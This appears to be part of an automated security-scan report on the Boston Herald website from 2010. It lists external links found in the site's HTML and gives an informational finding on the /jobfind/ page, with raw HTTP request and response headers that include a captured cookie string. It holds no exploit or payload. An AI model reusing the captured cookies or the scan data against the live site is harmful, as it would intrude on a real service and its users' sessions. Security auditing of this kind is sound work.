<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="/news/regional/view/20101109close_shave_for_wife_killer_doc_transsexual_just_needs_more_razors/format=comments&srvc=home&position=5">
...[SNIP]...
<a href="/track/inside_track/view/20101108because_sassy_gay_friend_says_so/srvc=home&position=6"><img
src="http://multimedia.heraldinteractive.com/images/20101107/stp/b9b0fc_sassy_11082010.jpg" alt="&#x2018;Sassy Gay Friend&#x2019; YouTube star Brian Gallivan.">
</a>
...[SNIP]...
<a href="/entertainment/television/general/view/20101108hot_coco_timing_is_ideal_for_conans_return_to_late-night_wars/srvc=home&position=7"><img
src="http://multimedia.heraldinteractive.com/images/20101107/stp/c595ca_ltpconan20101108.jpg" alt="Conan O&rsquo;Brien returns tonight with &#x201C;Conan,&#x201D; running Monday through Thursdays at 11 p.m. on TBS.">
</a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="/entertainment/television/general/view/20101108hot_coco_timing_is_ideal_for_conans_return_to_late-night_wars/format=comments&srvc=home&position=7">
...[SNIP]...
<a href="/sports/football/other_nfl/view.bg?articleid=1294845&srvc=home&position=active">
<img src="http://multimedia.heraldinteractive.com/images/20101108/stp/590145_aaron_11082010.jpg" alt=""></a>
...[SNIP]...
<a href="/news/columnists/view.bg?articleid=1294174&srvc=home&position=active">
<img src="http://multimedia.heraldinteractive.com/images/20101105/stp/b3cddd_dwoodhead11052010.jpg" alt=""></a>
...[SNIP]...
<li>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif" alt="Gallery">
<a class="blockOneBlue" href="/news/columnists/view.bg?articleid=1294174&srvc=home&position=rated">
...[SNIP]...
<li>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Poll">
<a class="blockOneBlue" href="/news/columnists/view.bg?articleid=1294174&srvc=home&position=rated">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a class="blockOneBlue"
href="/news/regional/view.bg?articleid=1288456&format=comments&srvc=home&position=emailed">
...[SNIP]...
<div id="containerSliderInner">
<script src="http://cache.heraldinteractive.com/js/carousel.js" type="text/javascript"></script>
...[SNIP]...
<div id="next-arrow-container">
<img alt="More" id="SliderMoreButton" src="http://cache.heraldinteractive.com/images/siteImages/slider/sliderNewsMoreOn.gif" />
</div>
    <div id="prev-arrow-container">
<img alt="Back" id="SliderBackButton" src="http://cache.heraldinteractive.com/images/siteImages/slider/sliderNewsBackOff.gif" />
<!--//
<img id="ShadowLeft" src="http://cache.heraldinteractive.com/images/siteImages/slider/sliderShadowLeft.png" alt="" />
...[SNIP]...
<a href="/blogs/lifestyle/fork_lift"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/blogLogos/FORKLIFT_177x57.jpg" />
<div class="sliderTitle" style="color:#630">
...[SNIP]...
<a href="/blogs/sports/high_school"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/blogLogos/INSIDER_177x57.png" />
<div class="sliderTitle" style="color: #039">
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/news/katy_on_the_campaign_trail/"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/version5.0/site_images/slider/katyJordan_177x57.gif" /></a>
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/news/on_the_t/"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/version5.0/site_images/slider/OnTheT_177x57.jpg" /></a>
...[SNIP]...
<li class="SliderItem">
<img class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/taxMoney177.gif" alt="Your tax dollars at work" />
<div style="line-height:16px">
...[SNIP]...
<a href="http://www.bostonherald.com/search/?topic=scholz&searchSite=recent&x=0&y=0#articleFull"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/version5.0/site_images/slider/scholz.jpg" /></a>
...[SNIP]...
<a href="http://www.bostonherald.com/shopping/half_price_boston/" style="color:#333; font-weight:bold"><img alt="Boston Herald" class="thumb" border="0" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/halfPriceBoston177.gif" /><div class="sliderTitle">
...[SNIP]...
<a href="http://www.bostonherald.com/news/police_logs/"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/policeBlotter177.gif" alt="Boston Police Blotter" /><div class="sliderTitle">
...[SNIP]...
<a href="http://www.bostonherald.com/projects/mcas2009?srvc=slider"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/version5.0/site_images/slider/2009mcas.jpg" />
<div class="sliderTitle">
...[SNIP]...
<a href="http://www.bostonherald.com/users/register?srvc=slider"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/enews177.gif" /><div class="sliderTitle">
...[SNIP]...
<a href="/store/">
<img alt="Boston Herald" class="thumb" border="0" src="http://cache.heraldinteractive.com/store/images/sportsHistory177.jpg" />
<div class="sliderTitle">
...[SNIP]...
<a href="http://www.bostonherald.com/jobfind"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/jobfind177.gif" /><div class="sliderTitle">
...[SNIP]...
<li class="SliderItem"><a href="http://www.shoplocal.com/bostonherald/"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/shopLocal177.gif" /><div class="sliderTitle">
...[SNIP]...
<a href="http://www.bostonherald.com/about/home_delivery/"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/homeDelivery177.gif" /><div class="sliderTitle">
...[SNIP]...
<li class="SliderItem"><a href="http://www.collegeanduniversity.net/herald/"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/college177.gif" /><div class="sliderTitle">
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/sports/rap_sheet/index.php/2010/11/07/vince-wilfork-on-todays-performance-we-played-the-way-we-practiced-like-crap/"><img src="http://cache.heraldinteractive.com/blogs/sports/rap_sheet/wp-content/uploads/2010/11/vince-wilfork.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/entertainment/guestlisted/index.php/2010/11/05/illegal-downloader-jammie-thomas-rasset-hit-with-15-million-fine/"><img src="http://multimedia.heraldinteractive.com/images/419a149cad_music07072009.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/lifestyle/behind_the_wheel/?p=1147"><img src="http://cache.heraldinteractive.com/blogs/lifestyle/behind_the_wheel/wp-content/uploads/2010/11/nashstreetrod.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/sports/celtics/index.php/2010/11/06/postgame-notes-from-another-wild-night-at-the-garden/"><img src="http://cache.heraldinteractive.com/blogs/sports/celtics/wp-content/uploads/2010/11/rondofeet.JPG" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://bostonherald.com/blogs/entertainment/the_assistant/?p=2210"><img src="http://images.nymag.com/images/2/daily/2010/11/05_privatepractice_560x375.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/news/city_desk_wired/index.php/2010/11/07/british-fear-factor-over-bay-state-jails/"><img src="http://cache.heraldinteractive.com/blogs/news/city_desk_wired/wp-content/uploads/2010/11/neil-entwistle.JPG" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/sports/high_school/index.php/2010/11/05/fridays-high-school-football-schedule-2/"><img src="http://cache.heraldinteractive.com/blogs/sports/high_school/wp-content/uploads/2010/11/img_0192.JPG" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/sports/red_sox/index.php/2010/11/07/money-matters-taking-a-look-at-red-sox-payroll/"><img src="http://cache.heraldinteractive.com/blogs/sports/red_sox/wp-content/uploads/2010/11/theoheraldfile.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://bostonherald.com/blogs/lifestyle/fork_lift/?p=2367"><img src="http://cache.heraldinteractive.com/blogs/lifestyle/fork_lift/wp-content/uploads/2010/11/efd7c5_ltpback20101105-300x261.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="/sports/baseball/other_mlb/view.bg?articleid=1294857"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20101108/2ab65a_clee11082010.jpg"></a>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('galleries/index.php?gallery_id=9','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img src="http://multimedia.heraldinteractive.com/images/promo/frontpdf_11072010.jpg" alt="" /></a>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('/galleries/index.php?gallery_id=10','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img src="http://multimedia.heraldinteractive.com/images/promo/backpdf_11072010.jpg" alt="" /></a>
...[SNIP]...
<div style="font-size: 10px; color: #999; margin-top: 6px;">
           Powered by <a href="http://www.local.com" style="text-decoration: none;">Local.com</a>
...[SNIP]...
<div>+ <a href="http://coupons.smartsource.com/web/index.aspx?Link=5ZTSY3SFTCCTE">Money Saving Coupons</a>
...[SNIP]...
<div>+ <a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<div>+ <a href="http://www.people2people.com/?connect=boshrld&amp;page=login">Personals</a>
...[SNIP]...
<div>+ <a href="http://www.shoplocal.com/bostonherald/">Great Shopping&nbsp;Deals</a>
...[SNIP]...
<div>+ <a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<a href="/about/electronic_edition/"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/homepage/sampleFrontPage120.jpg" style="border: 1px #333 solid" /></a>
...[SNIP]...
<a
href="/news/regional/view/20101108roxbury_man_dies_after_stabbing_at_liquor_store/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20101107/stp/0b0f8e_stab_11082010.jpg" alt="GRIEVING: A friend hugs Shondell Davis, the aunt of the stabbing victim, in Roxbury yesterday." /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/news/regional/view/20101108roxbury_man_dies_after_stabbing_at_liquor_store/format=comments&srvc=home&position=also">
...[SNIP]...
<a href="/weather/"><img src="http://cache.heraldinteractive.com/images/siteImages/weather/19.gif" /></a>
...[SNIP]...
<br />
   <img src="http://cache.heraldinteractive.com/images/siteImages/weather/18.gif" width="57" height="48"/><br />
...[SNIP]...
<br />
   <img src="http://cache.heraldinteractive.com/images/siteImages/weather/04.gif" width="57" height="48"/><br />
...[SNIP]...
<br />
   <img src="http://cache.heraldinteractive.com/images/siteImages/weather/03.gif" width="57" height="48"/><br />
...[SNIP]...
<a
href="/sports/columnists/view/20101108eric_mangini_outdoes_bill_belichick_student_teaches_lesson/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20101108/stp/f0cad3_shake_11082010.jpg" alt="PARTING SHOT: Eric Mangini shakes hands with Bill Belichick after his Browns hammered the Patriots, 34-14, yesterday in Cleveland." /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/sports/columnists/view/20101108eric_mangini_outdoes_bill_belichick_student_teaches_lesson/format=comments&srvc=home&position=also">
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/game.aspx?team=028"></script>
...[SNIP]...
</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=mlb/teams/028/schedule.aspx?team=028,season=">Schedule</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&amp;page=mlb/teams/028/individual.aspx?team=028">Ind. Stats</a>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/nflgame.aspx?team=077"></script>
...[SNIP]...
</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nfl/teams/077/sched.aspx?id=077">Schedule</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nfl/teams/077/teamstat.aspx?id=077">Stats</a>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/nbagame.aspx?team=092"></script>
...[SNIP]...
</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nba/teams/092/schedule.aspx?team=092,season=">Schedule</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nba/teams/092/tmstat.aspx?id=092">Ind. Stats</a>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/nhlgame.aspx?team=121"></script>
...[SNIP]...
</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nhl/teams/121/schedule.aspx?team=121,season=">Schedule</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nhl/teams/121/indstats.aspx?team=121">Ind. Stats</a>
...[SNIP]...
<a
href="/entertainment/movies/general/view/20101108desperate_hours_franco_spends_time_with_hiker_who_survived_against_the_odds/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20101107/stp/8b11c8_ltpfranco20101107_edited-1.jpg" alt="James Franco in &lsquo;127 Hours.&rsquo;" /></a>
...[SNIP]...
<a href="/entertainment/arts_culture/view.bg?articleid=1294669&srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20101107/3ec29e_07tosc1.jpg" border="0"
width="207" height="181" caption="Romantic, dramatic &lsquo;Tosca&rsquo; is a winner" />
</a>
...[SNIP]...
<a
href="/track/inside_track/view/20101108tracked_down_michelle_mcgee_ty_law_lou_merloni_and_more/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20101107/stp/4348cc_bomb_11082010.jpg" alt="Michelle &#x2018;Bombshell&#x2019; McGee,left, and Revolution Rock Bar bartender Caela Scott." /></a>
...[SNIP]...
<a href="/track/star_tracks/view.bg?articleid=1294837&srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20101108/4e5b50_lil_11082010.jpg" border="0"
width="207" height="181" caption="Lil Wayne is free, but at what price?" />
</a>
...[SNIP]...
<a
href="/business/general/view/20101108caritas_sale_critic_hits_ethics_board/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20101107/stp/bc9344_coak_11082010.jpg" alt="Martha Coakley." /></a>
...[SNIP]...
<div id="busTabsHp" style="width:180px; margin:0 auto;">
<script language="javascript" src="http://hosted.ap.org/dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html?CN=AP707&gf=3&idx=2&SITE=MABOH&SECTION=DJSP_COMPLETE"></script>
...[SNIP]...
<a
href="/jobfind/news/technology/view/20101108polaroid_goes_back_to_the_future_instant_cameras_set_for_age_of_internet/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20101107/stp/d24c15_pola2_11082010.jpg" alt="REPLAY: The &#36;90 300 Instant Camera(inset) replicates the function of the classic Polaroid camera - more or less, since the printout is about half the size. The &#36;200 Pogo offers both instant and digital photos." /></a>
...[SNIP]...
<a href="http://www.bostonherald.com/jobfind"><img src="http://cache.heraldinteractive.com/images/siteImages/jobfind/homepageHotJobsSearch.gif"></a>
...[SNIP]...
<h2><a class="LinksBlackNone" href="http://www.homefind.com/?srvc=home&position=also">Homefind</a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/business/real_estate/view/20101107critics_hit_feds_appraisal_rules/format=comments&srvc=home&position=also">
...[SNIP]...
<div class="featuredListHF_logo">
<img src="http://multimedia.heraldinteractive.com/misc/alsoIn/homefind/HF5728980.jpg" />
    </div>
   <span class="bold">
    <a class="orange" href="http://www.homefind.com/?listingid=HF5728980">
1212 North Main Street,<br>
...[SNIP]...
</span>
        <a class="orange" href="http://www.homefind.com/?listingid=HF5728980">View listing</a>
...[SNIP]...
</div>    
<a class="orange" href="http://www.homefind.com">Search Homes</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="orange" href="http://www.homefind.com/post-property/">Post a Property</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="orange" href="http://www.homefind.com/for-agents/">For Agents</a>
...[SNIP]...
<h2><a class="LinksBlackNone" href="http://www.carfind.com/?srvc=home&position=also">Carfind</a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/business/automotive/view/20101107blinking_jetta_hates_her_husband/format=comments&srvc=home&position=also">
...[SNIP]...
<div class="carFindAreaTab"><a class="LinksWhiteNone" href="http://www.carfind.com/">Search Cars</a>
...[SNIP]...
<div class="carFindAreaTab"><a class="LinksWhiteNone" href="http://www.carfind.com/sellCar.bg">Sell a Car</a>
...[SNIP]...
<div class="carFindAreaTab"><a class="LinksWhiteNone" href="http://boston30.autochooser.com/results.asp?gid=0&pagename=dealersearch.asp&resulttype=2&postto=results.asp">Find a dealer</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" style="margin-right:30px;"></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" style="margin-right:30px;"></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif"></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2F&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...
</script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT>
...[SNIP]...

8.13. http://bostonherald.com/jobfind/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /jobfind/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /jobfind/?srvc=home&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 09:28:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 60087

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >

<head>
<!-- // jobfind/index.tmpl
...[SNIP]...
<![endif]-->

<link rel="alternate" title="Jobfind - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/jobfind/" type="application/rss+xml">

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
   <script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>

   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fjobfind%2F&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/jobfind/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<li class="SubNavMain"><a href="http://hotjobs.yahoo.com/jobseeker/jobsearch/my_searches.html?partner=bostonherald">My Searches</a>
...[SNIP]...
<li class="SubNavMain"><a href="http://hotjobs.yahoo.com/jobseeker/jobsearch/saved_job_manager.html?partner=bostonherald">My Jobs</a>
...[SNIP]...
<li class="SubNavMain"><a href="http://hotjobs.yahoo.com/jobseeker/myhj/resume-manager.html?partner=bostonherald">My Resumes</a>
...[SNIP]...
<li class="SubNavMain"><a href="http://jobfind.salary.com/">What are you worth?</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<div class="hjConsoleHeader">
       <a target="hotjobs" href="http://hotjobs.yahoo.com" ylc="http://hotjobs.yahoo.com/;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald">
           <img src="http://l.yimg.com/a/i/us/hj/gr2/monst_lo_nwsp_console_3.gif" alt="Search for jobs with Monster+HotJobs" style="border-width:0px;"/>
       </a>
...[SNIP]...
ize:11px;color:#000000;background:transparent url(http://l.yimg.com/a/i/us/hj/gr/yellow-buttons.gif) no-repeat scroll 0px 0px;height:22px;width:75px;cursor:pointer;float:right;margin-right:10px;">
               <a target="hotjobs" href="http://hotjobs.yahoo.com/jobs-search-advanced/" ylc="http://hotjobs.yahoo.com/jobs-search-advanced/;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald" style="font-size:85%;color:#004CCA;text-decoration:underline;">Advanced Search</a>
...[SNIP]...
<li><a target="hotjobs" style="color:#004CCA;text-decoration:underline;" href="http://hotjobs.yahoo.com/jobseeker/login/login.html?.done=http%3A%2F%2Fhotjobs.yahoo.com%2Fjobseeker%2Fjobsearch%2Fmy_searches.html%3Fpartner%3Dbostonherald" ylc="http://hotjobs.yahoo.com/jobseeker/login/login.html;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?.done=http%3A%2F%2Fhotjobs.yahoo.com%2Fjobseeker%2Fjobsearch%2Fmy_searches.html%3Fpartner%3Dbostonherald&partner=bostonherald">Sign In</a>&nbsp;|&nbsp;<a target="hotjobs" style="color:#004CCA;text-decoration:underline;" href="https://us.lrd.yahoo.com/_ylc=X3oDMTFxZmRpYTFrBF9TAzM5NjUxMTI1MQRsaWQDcmVnaXN0ZXIEcGFydG5lcgNib3N0b25oZXJhbGQEc3JjA2NvbnNvbGU-/SIG=15hpku0jd/**https%3A//login.yahoo.com/config/eval_register%3F.last=http%253A%252F%252Fhotjobs.yahoo.com%252Fjobseeker%252Flogin%252Flogin.html%253Fpartner%253Dbostonherald%26.src=hotjobs">Register</a>
...[SNIP]...
</h1>
       <a target="hotjobs" style="color:#004CCA;text-decoration:underline;" href="http://hotjobs.yahoo.com/resume" ylc="http://hotjobs.yahoo.com/resume;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald">Resumes</a>&nbsp;|&nbsp;<a target="hotjobs" style="color:#004CCA;text-decoration:underline;" href="http://hotjobs.yahoo.com/interview" ylc="http://hotjobs.yahoo.com/interview;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald">Interviewing</a>&nbsp;|&nbsp;<a target="hotjobs" style="color:#004CCA;text-decoration:underline;" href="http://hotjobs.yahoo.com/salary" ylc="http://hotjobs.yahoo.com/salary;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald">Salary</a><br />
       <a target="hotjobs" style="color:#004CCA;text-decoration:underline;" href="http://hotjobs.yahoo.com/networking" ylc="http://hotjobs.yahoo.com/networking;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald">Networking</a>&nbsp;|&nbsp;<a target="hotjobs" style="color:#004CCA;text-decoration:underline;" href="http://hotjobs.yahoo.com/diversity" ylc="http://hotjobs.yahoo.com/diversity;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald">Diversity</a>
...[SNIP]...
<div class="hjConsoleContent hjConsoleContentRight">
